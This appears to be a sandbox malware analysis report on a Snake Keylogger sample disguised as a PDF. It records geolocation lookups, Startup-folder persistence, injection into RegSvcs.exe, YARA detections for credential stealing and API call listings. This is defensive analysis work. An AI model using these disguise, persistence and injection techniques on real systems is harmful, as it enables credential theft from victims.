Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:25 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:25 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:25 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484874 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9cVOE4%2FMgSE9CMyH93B46sg%2FduZ3VU%2FP3Z3FssJ7FjPv9AXCwovr%2Bx9u00oEYBBKiYdmcVp2VpDroJZSFK4Y2FDtHrsjOMDpcDHhqeFtUSKjgy91AL3UE8QadW6TwOlUf4P1jjI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800ac3a8c78c9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1427872&cwnd=170&unsent_bytes=0&cid=8d3dfca501c2985a&ts=464&x=0"
2024-11-25 07:49:25 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:25 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:26 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:25 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484874 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxUrTVviCLGfXdxOaY448ZH7Bin4JTu2Fg6wiyCQfpzbjml4NUDPOWm1usBvnwBK219lNAI7fmA8zicaI6o72HUxEoqcU7356gfZp1fxIX8rvf5XtrOPX9w0ZqI9Y1%2F7n%2Fn4kJ68"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800ac4bf2c1a03-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1403171&cwnd=142&unsent_bytes=0&cid=caffc4b65f72f172&ts=459&x=0"
2024-11-25 07:49:26 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49759	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:28 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:29 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:28 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484877 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zggGFEfwmG45TGj5zrOlv12%2Bgf2AsrI52qs2TFsu4DQySAVOv%2BuZHHQvqpSMERl9AQ9Z3ZQ%2BIJQUEMfCsPbiAIngZ%2BTfSVki5govL5xoDQt3IiA%2B2OJowHbF5G2J5u3qI9NbCKMP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800ad77ad842c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2435&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1168935&cwnd=225&unsent_bytes=0&cid=06944a131f554542&ts=462&x=0"
2024-11-25 07:49:29 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:31 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:32 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:32 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484881 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QKrV%2BFk1Z0EydiQZBoV%2FkV44RMspZnIm%2FiV6hw%2B7Ls5T96%2BtGFh99WczA9rlbcx04Z%2Bgb4PZkrUbq3yMcURAqNm4PCM9Dr%2BwoQzwYVB13BvCHY67O%2FDDfQahJl8Iv64MpETYIDZG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800aec4d850cc0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1779402&cwnd=214&unsent_bytes=0&cid=72f560e0256f1c15&ts=461&x=0"
2024-11-25 07:49:32 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49763	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:35 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:35 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:35 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484884 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUkOnOCSac8BKiGYYm9e7Aq0Oz%2FD01LSAAvxxBRmLdj8vZGgoGGgG9KWN1auNxVvFYwsxJztSMDHVKWtQHHXj6P0EP9ILjyoDOhrBEOtNdmRxf5u0V005L99%2Bc8Sa%2FKXrgkkpkhx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800affdd037d26-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2038&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1452736&cwnd=188&unsent_bytes=0&cid=6749f9d4cdab495c&ts=464&x=0"
2024-11-25 07:49:35 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49765	172.67.177.134	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:38 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 07:49:38 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:38 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 484887 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MWZNAFn2u9KE3FvaWWyFSvkRNOL5Ua%2BPrqsSMAcAE3It%2F9B70EDET6B0p0URzxob3i9a90mxXK8lDuJEld%2FNtkkAhoAGYKu2CHgyezqWBcJXf%2Bw23WVj%2B29qRaexXV6cMeGKhP1P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e800b139e0a7274-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1919&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1482986&cwnd=181&unsent_bytes=0&cid=fc03387e1fd5928e&ts=464&x=0"
2024-11-25 07:49:38 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Target ID:	0
Start time:	02:48:56
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Imagebase:	0x80000
File size:	1'013'760 bytes
MD5 hash:	9A4FB2A5A118C7D3FEAFAF6D439FF40E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:48:57
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Wausaukee\silvexes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Imagebase:	0xbb0000
File size:	1'013'760 bytes
MD5 hash:	9A4FB2A5A118C7D3FEAFAF6D439FF40E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.1698528045.0000000001E60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:48:59
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe"
Imagebase:	0xb10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4120751881.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4119734142.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4120751881.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:49:09
Start date:	25/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs"
Imagebase:	0x7ff6430e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:49:10
Start date:	25/11/2024
Path:	C:\Users\user\AppData\Local\Wausaukee\silvexes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"
Imagebase:	0xbb0000
File size:	1'013'760 bytes
MD5 hash:	9A4FB2A5A118C7D3FEAFAF6D439FF40E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1825098136.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:49:11
Start date:	25/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Wausaukee\silvexes.exe"
Imagebase:	0x6b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4121149937.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4121149937.0000000002C2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0.5%
Signature Coverage:	6.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	152

Executed Functions

Function 000AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
Instruction ID: f4cb2f8d5b1020c0955541c39b621468e93228d942a4e44f599a032a96de33c6
Opcode Fuzzy Hash: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
Instruction Fuzzy Hash: 9A325F75B022288BCB249F98DC456E9B7F5FF4B310F1841D9E40AA7A92D7749E80CF52

Function 00083D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00083AA3,?), ref: 00083D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00083AA3,?), ref: 00083D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,00141148,00141130,?,?,?,?,00083AA3,?), ref: 00083DC8

Part of subcall function 00086430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00083DEE,00141148,?,?,?,?,?,00083AA3,?), ref: 00086471

SetCurrentDirectoryW.KERNEL32(?,?,?,00083AA3,?), ref: 00083E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001328F4,00000010), ref: 000F1CCE
SetCurrentDirectoryW.KERNEL32(?,00141148,?,?,?,?,?,00083AA3,?), ref: 000F1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0011DAB4,00141148,?,?,?,?,?,00083AA3,?), ref: 000F1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00083AA3), ref: 000F1D90

Part of subcall function 00083E6E: GetSysColorBrush.USER32(0000000F), ref: 00083E79
Part of subcall function 00083E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
Part of subcall function 00083E6E: LoadIconW.USER32(00000063), ref: 00083E9E
Part of subcall function 00083E6E: LoadIconW.USER32(000000A4), ref: 00083EB0
Part of subcall function 00083E6E: LoadIconW.USER32(000000A2), ref: 00083EC2
Part of subcall function 00083E6E: RegisterClassExW.USER32(?), ref: 00083F30

Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000836E6
Part of subcall function 000836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
Part of subcall function 000836B8: ShowWindow.USER32(00000000,?,?,?,?,00083AA3,?), ref: 0008371B
Part of subcall function 000836B8: ShowWindow.USER32(00000000,?,?,?,?,00083AA3,?), ref: 00083724

Part of subcall function 00084FFC: _memset.LIBCMT ref: 00085022
Part of subcall function 00084FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000850CB

Strings

runas, xrefs: 000F1D84
This is a third-party compiled AutoIt script., xrefs: 000F1CC8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
